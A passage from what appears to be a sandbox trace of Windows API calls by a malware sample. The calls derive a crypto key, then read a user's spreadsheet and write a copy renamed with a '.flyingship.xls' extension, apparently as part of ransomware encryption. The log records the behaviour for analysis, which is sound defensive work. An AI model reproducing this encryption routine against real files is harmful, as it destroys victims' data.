lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.645] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.645] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.645] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.645] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.645] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.645] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.645] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.645] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.645] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.645] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.645] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.646] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.646] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.646] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.646] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.646] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.646] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.646] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.647] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0172.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.647] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0172.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.647] CryptDestroyHash (hHash=0x90ae18) returned 1 [0172.647] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\oxndwhixtyjqte06unb5.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.649] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.649] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0172.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0172.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0172.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0172.651] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0172.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0172.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0172.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0172.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\oxndwhixtyjqte06unb5.flyingship.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0172.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.654] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0172.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0172.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0172.655] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0172.655] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0172.655] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0172.656] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0172.656] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0172.660] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x4707, lpOverlapped=0x0) returned 1 [0172.661] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0172.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14707) returned 0xa7f018 [0172.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0172.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0172.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14707) returned 0x9c5180 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0172.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14707) returned 0xa7f018 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.665] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, 